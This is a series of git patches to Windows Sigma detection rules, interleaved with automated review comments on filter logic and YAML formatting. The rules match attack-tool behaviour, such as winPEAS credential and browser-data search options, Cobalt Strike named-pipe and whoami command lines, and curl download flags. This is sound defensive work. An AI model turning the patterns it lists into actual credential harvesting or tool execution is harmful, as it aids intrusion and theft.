--- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -17,16 +17,16 @@ logsource: product: windows detection: winpeas_basic: - - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - - OriginalFileName: 'winPEAS.exe' # always the same + OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +39,8 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS + OriginalFileName: 'sysinfo.exe' condition: 1 of winpeas_* and not filter_sysinfo fields: - Image From 137653f08a89aa27893476562ccc585b2463703a Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:04:12 +0200 Subject: [PATCH 067/120] fix format and delete 'OriginalFileName' --- .../proc_creation_win_winpeas_tool.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index ee5604ae5..9696b83b3 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml 
@@ -5,8 +5,8 @@ description: WinPEAS is a script that search for possible paths to escalate priv author: Georg Lauenstein date: 2022/09/19 references: - - https://github.com/carlospolop/PEASS-ng - - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation tags: - attack.privilege_escalation - attack.t1082 @@ -17,16 +17,15 @@ logsource: product: windows detection: winpeas_basic: - Image|endswith: + Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' - '\winPEASx64.exe' - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - OriginalFileName: 'winPEAS.exe' # always the same winpeas_option: - CommandLine|contains: + CommandLine|contains: - 'systeminfo' # Search system information - 'userinfo' # Search user information - 'processinfo' # Search processes information @@ -39,8 +38,7 @@ detection: - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - 'eventsinfo' # Display interesting events information filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - OriginalFileName: 'sysinfo.exe' + Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS condition: 1 of winpeas_* and not filter_sysinfo fields: - Image @@ -49,5 +47,5 @@ fields: - ParentCommandLine - CurrentDirectory falsepositives: - - Should not be any as administrators do not use this tool + - Unlikely level: high From 2f7a54cc3176d0f9a0face8280509d0c65f9e044 Mon Sep 17 00:00:00 2001 
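Review bot: Dropping `OriginalFileName: 'winPEAS.exe'` from `winpeas_basic` in the second hunk removes the one indicator that survives a renamed binary, leaving only the `Image|endswith` file names. Since the previous commit had AND-ed it into the same map, the fix is to move rather than delete it: a separate `winpeas_pe:` selection holding `OriginalFileName: 'winPEAS.exe'` is picked up by the existing `1 of winpeas_*` condition as an alternative. The `filter_sysinfo` cut in the third hunk is probably harmless because the image path alone identifies that process. Replacing the `falsepositives` entry with `- Unlikely` gives the analyst nothing to triage against; naming what does trip the generic option strings would be more useful.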
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Tue, 20 Sep 2022 11:20:33 +0200 Subject: [PATCH 068/120] Fix FP --- ...vent_win_notepad_plus_plus_persistence.yml | 6 ++-- ...oad_side_load_from_non_system_location.yml | 3 ++ .../image_load_uipromptforcreds_dlls.yml | 17 +++++++---- ...ccess_win_direct_syscall_ntopenprocess.yml | 14 ++++++++- ...tion_win_cobaltstrike_process_patterns.yml | 29 +++++++++++-------- .../proc_creation_win_mstsc.yml | 6 ++-- ...ation_win_ntfs_short_name_path_use_cli.yml | 7 +++-- .../proc_creation_win_reg_add_run_key.yml | 6 ++-- .../proc_creation_win_susp_curl_download.yml | 13 +++++++-- ...susp_direct_asep_reg_keys_modification.yml | 1 + ...ation_win_susp_explorer_break_proctree.yml | 11 +++++-- .../proc_creation_win_susp_image_missing.yml | 4 ++- .../proc_creation_win_susp_non_exe_image.yml | 3 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 5 +++- .../proc_creation_win_system_exe_anomaly.yml | 6 ++-- ...ion_win_windows_terminal_susp_children.yml | 4 +++ .../registry_event_runonce_persistence.yml | 2 +- 17 files changed, 98 insertions(+), 39 deletions(-) diff --git a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml index 96e397ca5..d684b222a 100644 --- a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml +++ b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -6,7 +6,7 @@ author: Nasreddine Bencherchali references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ date: 2022/06/10 -modified: 2022/06/21 +modified: 2022/09/20 logsource: product: windows category: file_event 
@@ -20,7 +20,9 @@ detection: # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Temp\' - Image|endswith: '\target.exe' + Image|endswith: + - '\target.exe' + - 'Installer.x64.exe' condition: selection and not 1 of filter* falsepositives: - Possible FPs during first installation of Notepad++ diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..de8fc8740 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -421,6 +421,9 @@ detection: filter_appvpolicy: ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + filter_dell: + Image: 'C:\Windows\System32\backgroundTaskHost.exe' + ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index e82154a0b..a9e409fd4 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/08/13 +modified: 2022/09/20 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access 
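Review bot: The added `'Installer.x64.exe'` entry has no leading backslash, so `Image|endswith` accepts any executable whose name merely ends in that string, anywhere under `C:\Users\…\AppData\Local\Temp\`; together with the already broad Temp location this is a wide exclusion for a persistence rule. If the installer follows the `npp.<version>.Installer.x64.exe` naming (I believe it does, please confirm), adding `Image|contains: '\npp.'` to the same filter keeps the legitimate case while narrowing the exclusion; the x86 installer name is presumably different and is not covered, which may or may not be intended. The enclosing filter block starts outside the hunk. The `filter_dell` entry in the next file section is anchored on `System32` and `WindowsApps`, both protected locations, and looks fine.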
@@ -27,18 +27,23 @@ detection: filter_start: Image|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\explorer.exe' + - 'C:\Windows\SysWOW64\' - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: Image|endswith: '\opera_autoupdate.exe' filter_full: - Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + Image: + - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + - 'C:\Windows\explorer.exe' filter_user: Image|startswith: 'C:\Users\' - Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe' - filter_path: - Image|contains: '\Local\Microsoft\OneDrive\' + Image|endswith: + - '\AppData\Roaming\Spotify\Spotify.exe' + - '\AppData\Local\Microsoft\Teams\current\Teams.exe' + filter_contains: + Image|startswith: 'C:\Users\' + Image|contains: '\AppData\Local\Microsoft\OneDrive\' condition: selection and not 1 of filter_* falsepositives: - Other legitimate processes loading those DLLs in your environment. diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index e1587a4f6..c0a3ec60a 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/09/18 +modified: 2022/09/20 logsource: category: process_access product: windows 
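Review bot: The new `filter_user` and `filter_contains` entries exclude images under `C:\Users\…\AppData\Local\…` (Teams, OneDrive), which are user-writable locations, so these exclusions rest on a path the logged-in user controls rather than on a signed or protected binary. That is a common trade-off for per-user installers, but it deserves a comment in the rule, e.g. `# user-writable paths; pair with signature or hash fields where the log source provides them`, so the next maintainer does not read the filter as authoritative. The same applies to `falsepositive7` and `falsepositive10` added to proc_access_win_direct_syscall_ntopenprocess.yml in the next hunk. Moving `C:\Windows\explorer.exe` from `filter_start` into `filter_full` is an improvement, since the old entry was a `startswith` on a full path.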
@@ -32,6 +32,18 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive7: # VsCode + TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + falsepositive8: # Google Chrome + TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + falsepositive9: # Google Chrome Update + TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + falsepositive10: # MS Teams + TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index 851989769..f4328767e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml 
@@ -7,34 +7,39 @@ references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 -modified: 2022/03/05 +modified: 2022/09/20 tags: - attack.execution - - attack.t1059 + - attack.t1059 logsource: category: process_creation product: windows detection: - selection1: + selection1: CommandLine|contains: '\cmd.exe /C whoami' ParentImage|startswith: 'C:\Temp' selection2: - CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' - ParentCommandLine|contains: - - '/C whoami' - - 'cmd.exe /C echo' - - ' > \\\\.\\pipe' - selection3: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c echo' - '> \\\\.\\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' - selection4: + selection3: Image|endswith: '\cmd.exe' ParentImage|endswith: '\runonce.exe' ParentCommandLine|endswith: '\runonce.exe' - condition: 1 of selection* + selection_special1: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\\\.\\pipe' + filter_special1: + # Internet Download Manager - Chrome Extension + ParentCommandLine|contains: + - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe' + - 'chrome-extension://' + condition: 1 of selection* and (selection_special1 and not filter_special1) falsepositives: - Other programs that cause these patterns (please report) level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index e7200ba8f..20df29533 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml 
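Review bot: The new `condition: 1 of selection* and (selection_special1 and not filter_special1)` breaks the rule: `selection_special1` itself matches the `selection*` wildcard, and the outer `and` makes `selection_special1` mandatory, so `selection1`–`selection3` can no longer fire on their own and the rule collapses to `selection_special1 and not filter_special1`. The intended logic is an OR, `condition: (selection1 or selection2 or selection3) or (selection_special1 and not filter_special1)`, or rename the special pair so the wildcard does not pick it up. Separately, `- attack.t1059` appears to have gained extra indentation under `tags:`; if it is now indented deeper than `- attack.execution`, YAML folds it into that scalar as `attack.execution - attack.t1059` rather than a second tag, so the raw file is worth checking. The `selection1:` change differs only in whitespace.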
@@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/06/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -25,7 +25,9 @@ detection: - ' /g' - ' /u' - ' /p' - condition: all of selection_mstsc* or all of selection_cmdkey* + filter_mstsc_1: + ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - Unknown level: medium diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 6fe080f91..e09469b62 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/09/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -22,8 +22,9 @@ detection: - '~2\' filter: - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe + - 'C:\Windows\System32\Dism.exe' + - 'C:\Windows\System32\cleanmgr.exe' + - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe' - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index ef9ededa7..ad770a245 100644 
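Review bot: `condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey*` relies on `and` binding tighter than `or`; it evaluates as intended, but mixed operators without parentheses are easy to misread when the next filter is added. Write it explicitly as `condition: (all of selection_mstsc* and not 1 of filter_mstsc_*) or all of selection_cmdkey*`. The `filter_mstsc_1` exact `ParentImage` match on `wslhost.exe` under `System32` is a reasonable, non-user-writable anchor, and the `dopus.exe` entry in the next file section is likewise an exact path under Program Files.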
--- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -12,13 +12,15 @@ logsource: product: windows detection: selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg' - ' ADD ' - 'Software\Microsoft\Windows\CurrentVersion\Run' condition: selection falsepositives: - - Unknown + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. + - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 5ca802523..67f7c265e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/09/13 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -41,7 +41,16 @@ detection: - ' -O' # covers the alias for --remote-name and --output - '--remote-name' - '--output' - condition: selection_curl and 1 of selection_susp* + filter_git_windows: + ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe' + ParentCommandLine|contains|all: + - 'git-update-git-for-windows' + - '--quiet --gui' + Image: 'C:\Program Files\Git\mingw64\bin\curl.exe' + CommandLine|contains|all: + - '--silent --show-error --output ' + - 'gfw-httpget-' + condition: selection_curl and 1 of selection_susp* and not 1 of filter_* fields: - CommandLine - ParentCommandLine 
diff --git a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml index 421e0f538..fa812d78b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml @@ -29,6 +29,7 @@ fields: falsepositives: - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml index 880093006..64bd7a5e7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml 
@@ -2,21 +2,26 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" -author: Florian Roth, Nasreddine Bencherchali +author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber' references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ date: 2019/06/29 -modified: 2022/06/14 +modified: 2022/09/20 logsource: category: process_creation product: windows detection: selection: # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' + - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There is exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - 'explorer.exe' + - ' /root,' condition: selection falsepositives: - Unknown how many legitimate software products use that method diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml index 05d19eed8..f01b13a1f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml 
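Review bot: The new `CommandLine|contains|all` entry on `'explorer.exe'` and `' /root,'` fires on any Explorer launch rooted at a folder, which is an everyday invocation (shortcuts, scripts and installers open a folder with `explorer.exe /root,<path>`), and unlike the `/factory,{…}` CLSID it does not by itself indicate a process-tree break; the added comment even calls `/root` "just an example". Given the rule's level (outside the hunk), either keep this as a separate lower-confidence selection or at least record it, e.g. `- Legitimate shortcuts and scripts that open Explorer at a folder with /root`, under `falsepositives`. The three inline comments on the `- CommandLine|contains:` lines are long; moving them above the entry keeps the YAML lines readable, and `There is exists almost infinite possibilities` should read `There are almost infinite possibilities`.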
+++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/03/08 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -25,9 +25,11 @@ detection: - Image: - 'Registry' - 'MemCompression' + - 'vmmem' - CommandLine: - 'Registry' - 'MemCompression' + - 'vmmem' condition: not image_absolute_path and not 1 of filter* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml index d89582a80..e8b55f8fe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/06/20 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -23,6 +23,7 @@ detection: Image: - 'Registry' - 'MemCompression' + - 'vmmem' filter_empty: Image: - '-' diff --git a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml index 7912a646f..911c0d961 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml 
@@ -11,7 +11,7 @@ tags: - attack.t1218 author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2019/11/12 -modified: 2022/08/23 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -32,6 +32,9 @@ detection: - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\GitHubDesktop\Update.exe --createShortcut GitHubDesktop.exe' + - CommandLine|contains|all: + - 'C:\Users\' + - '\AppData\Local\GitHubDesktop\Update.exe --processStartAndWait GitHubDesktop.exe' - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index e9ec591cf..14d2cd03e 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/09/07 +modified: 2022/09/20 tags: - attack.defense_evasion - attack.t1036 @@ -71,7 +71,9 @@ detection: - 'C:\Windows\WinSxS\' # - 'C:\avast! sandbox' - Image|contains: '\SystemRoot\System32\' - - Image: 'C:\Windows\explorer.exe' + - Image: + - 'C:\Windows\explorer.exe' + - 'C:\Program Files\PowerShell\7\pwsh.exe' condition: selection and not filter fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 38dea0b0b..92a7a55f9 100644 --- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml 
@@ -47,6 +47,10 @@ detection: CommandLine|contains|all: - '\AppData\Local\Packages\Microsoft.WindowsTerminal_' - '\LocalState\settings.json' + filter_vsdevcmd: + CommandLine|contains|all: + - 'C:\Program Files\Microsoft Visual Studio\' + - '\Common7\Tools\VsDevCmd.bat' condition: all of selection_* and not 1 of filter_* falsepositives: - Other legitimate "Windows Terminal" profiles diff --git a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml index a998c6b34..1fc7bde2f 100644 --- a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml +++ b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml @@ -17,7 +17,7 @@ detection: TargetObject|endswith: '\StubPath' filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|endswith: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' + Details|contains: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' From cb09f9d522576dabfc2af60e4919bee331ce610b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:44:56 +0200 Subject: [PATCH 069/120] Update proc_creation_win_winpeas_tool.yml --- .../proc_creation_win_winpeas_tool.yml | 27 ++++++------------- 1 file changed, 8 insertions(+), 19 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 9696b83b3..0b34ea85c 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml 
@@ -16,7 +16,7 @@ logsource: category: process_creation product: windows detection: - winpeas_basic: + selection_basic: Image|endswith: - '\winPEASany.exe' - '\winPEASany_ofs.exe' @@ -24,28 +24,17 @@ detection: - '\winPEASx64_ofs.exe' - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' - winpeas_option: - CommandLine|contains: - - 'systeminfo' # Search system information - - 'userinfo' # Search user information - - 'processinfo' # Search processes information + selection_pe: + OriginalFileName: 'winPEAS.exe' + selection_option: + - CommandLine|endswith: - 'serviceinfo' # Search services information - 'applicationsinfo' # Search installed applications information - - 'networkinfo' # Search network information - 'windowscreds' # Search windows credentials - 'browserinfo ' # Search browser information - - 'filesinfo ' # Search generic files that can contains credentials - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files - - 'eventsinfo' # Display interesting events information - filter_sysinfo: - Image|endswith: '\systeminfo.exe' # due to option "systeminfo" via winPEAS - condition: 1 of winpeas_* and not filter_sysinfo -fields: - - Image - - User - - CommandLine - - ParentCommandLine - - CurrentDirectory + - CommandLine|contains: '.exe browserinfo ' # Search browser information + condition: 1 of selection* falsepositives: - - Unlikely + - Other programs that use the same command line flags level: high From 83fbd7f258a315417f4418f0f07700cd4abcfa7c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 20 Sep 2022 17:45:13 +0200 Subject: [PATCH 070/120] Update proc_creation_win_winpeas_tool.yml --- .../windows/process_creation/proc_creation_win_winpeas_tool.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 0b34ea85c..917e8fdba 100644 
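Review bot: In `selection_option`, `'browserinfo '` under `CommandLine|endswith` keeps a trailing space, so it can only match a command line that ends in a space — effectively dead, which is probably why the separate `CommandLine|contains: '.exe browserinfo '` was added; drop the space: `- 'browserinfo'`. With `condition: 1 of selection*` the `selection_option` block still fires alone on command lines ending in common words such as `serviceinfo` or `applicationsinfo`, so switching from `contains` to `endswith` narrows the earlier list but does not tie the token to a winPEAS invocation; the `'.exe browserinfo '` shape is the better one for all of them. The `selection_pe:` / `OriginalFileName:` pair looks mis-indented in this hunk (the next commit re-indents it), which suggests the file was not run through the repository linter before pushing.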
--- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -25,7 +25,7 @@ detection: - '\winPEASx86.exe' - '\winPEASx86_ofs.exe' selection_pe: - OriginalFileName: 'winPEAS.exe' + OriginalFileName: 'winPEAS.exe' selection_option: - CommandLine|endswith: - 'serviceinfo' # Search services information From ad6ddf5896d2032293e56d76a1e1821e9c6ae7b2 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Tue, 20 Sep 2022 13:47:17 -0500 Subject: [PATCH 071/120] feat(backend): add support for linux.network_connection Also remove evaluatorId --- tools/sigma/backends/lacework.py | 104 ++++++++++++++++++------------- 1 file changed, 61 insertions(+), 43 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index f3c5eb870..df4e60f0c 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -33,10 +33,9 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( textwrap.dedent(''' --- - version: 0.3 + version: 0.4 services: cloudtrail: - evaluatorId: 